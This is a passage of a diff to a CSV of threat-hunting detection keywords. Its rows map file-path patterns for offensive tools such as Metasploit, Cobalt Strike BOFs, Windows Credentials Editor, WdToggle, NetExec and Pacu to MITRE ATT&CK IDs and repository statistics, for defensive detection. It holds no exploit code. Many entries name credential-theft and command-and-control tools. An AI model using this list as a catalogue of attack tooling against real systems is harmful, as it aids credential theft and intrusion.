TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/vnc-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/vncdll.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/vncdll/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/vncEncoder.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/VNCHooks*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" -"*/VNCHooks.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31309","13502","2023-10-03T21:22:33Z","2011-08-30T06:13:20Z" +"*/vncdll.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/vncdll/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/vncEncoder.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/VNCHooks*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/VNCHooks.*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*/vnc-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/vnc-title.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/vnik_v1.c*","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","4725","1055","2023-08-18T17:29:23Z","2016-10-06T21:55:51Z" "*/voldemort-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/vpc__enum_lateral_movement*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/vss-enum.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-03T16:51:44Z","2022-01-24T20:44:38Z" -"*/vssenum/*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","964","172","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" +"*/vpc__enum_lateral_movement*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","1","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/vss-enum.py*","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","137","32","2023-10-04T12:36:29Z","2022-01-24T20:44:38Z" +"*/vssenum/*","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","10","10","966","173","2023-09-22T15:51:55Z","2020-07-15T16:21:18Z" "*/vtam-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/vulners.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/vulnscan.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4712","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" -"*/vulnserver.py*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28282","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" +"*/vulnscan.yaml*","offensive_tool_keyword","Osmedeus","Osmedeus - A Workflow Engine for Offensive Security","T1595","TA0043","N/A","N/A","Exploitation Tools","https://github.com/j3ssie/osmedeus","1","1","N/A","N/A","10","4716","845","2023-09-16T05:02:26Z","2018-11-10T04:17:18Z" +"*/vulnserver.py*","offensive_tool_keyword","sqlmap","Automatic SQL injection and database takeover tool.","T1190 - T1556 - T1574","TA0001 - TA0002 - TA0003","N/A","N/A","Exploitation tools","https://github.com/sqlmapproject/sqlmap","1","1","N/A","N/A","10","28287","5460","2023-09-28T18:34:55Z","2012-06-26T09:52:15Z" "*/vulscan.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" "*/vuze-dht-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"*/waf__enum/main.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3687","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" -"*/wapitiCore/*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*/wapiti-scanner/*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-09-27T07:26:22Z","2020-06-06T20:17:55Z" -"*/Watson.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1885","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*/waf__enum/main.py*","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Framework","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","3689","624","2023-10-03T04:16:53Z","2018-06-13T21:58:59Z" +"*/wapitiCore/*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*/wapiti-scanner/*","offensive_tool_keyword","wapiti","Web vulnerability scanner written in Python3","T1592 - T1592.003","TA0007 - TA0040","N/A","N/A","Web Attacks","https://github.com/wapiti-scanner/wapiti","1","1","N/A","N/A","8","785","132","2023-10-04T14:09:48Z","2020-06-06T20:17:55Z" +"*/Watson.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" "*/wce32.exe*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" "*/wce64.exe*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" "*/wce-beta.zip*","offensive_tool_keyword","wce","Windows Credentials Editor","T1003.002 - T1003.003 - T1558.001 - T1558.003 - T1110 - T1055.001","TA0006 - TA0005 - TA0002","N/A","N/A","Credential Access","https://www.kali.org/tools/wce/","1","1","N/A","8","4","N/A","N/A","N/A","N/A" @@ -5756,14 +5819,17 @@ "*/WDExtract.git*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*/wdextract32.exe*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" "*/wdextract64.exe*","offensive_tool_keyword","WDExtract","Extract Windows Defender database from vdm files and unpack it","T1059 - T1005 - T1119","TA0002 - TA0009 - TA0003","N/A","N/A","Defense Evasion","https://github.com/hfiref0x/WDExtract/","1","1","N/A","8","4","347","56","2020-02-10T06:53:43Z","2019-04-19T17:33:48Z" +"*/wdigest.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" "*/WdToggle.c*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "*/WdToggle.h*","offensive_tool_keyword","cobaltstrike","A Beacon Object File (BOF) for Cobalt Strike which uses direct system calls to enable WDigest credential caching.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/outflanknl/WdToggle","1","1","N/A","10","10","217","32","2023-05-03T19:51:43Z","2020-12-23T13:42:25Z" "*/weakpass.git*","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","10","3","293","36","2023-03-17T22:45:29Z","2021-08-29T13:07:37Z" -"*/Web/decouverte.txt*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","191","44","2023-10-03T14:28:50Z","2020-10-21T14:37:53Z" -"*/Web/discovery.txt*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","191","44","2023-10-03T14:28:50Z","2020-10-21T14:37:53Z" +"*/Web/decouverte.txt*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z" +"*/Web/discovery.txt*","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","2","192","44","2023-10-04T14:27:37Z","2020-10-21T14:37:53Z" "*/web/pwn.html*","offensive_tool_keyword","POC","Just another PoC for the new MSDT-Exploit","T1190 - T1203 - T1068 - T1210","TA0001 - TA0002 - TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/ItsNee/Follina-CVE-2022-30190-POC","1","1","N/A","N/A","1","5","0","2022-07-04T13:27:13Z","2022-06-05T13:54:04Z" -"*/web_rce.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6330","762","2023-10-03T21:06:53Z","2015-08-30T07:22:51Z" +"*/web_delivery.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/web_rce.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" "*/WebC2.cs*","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - 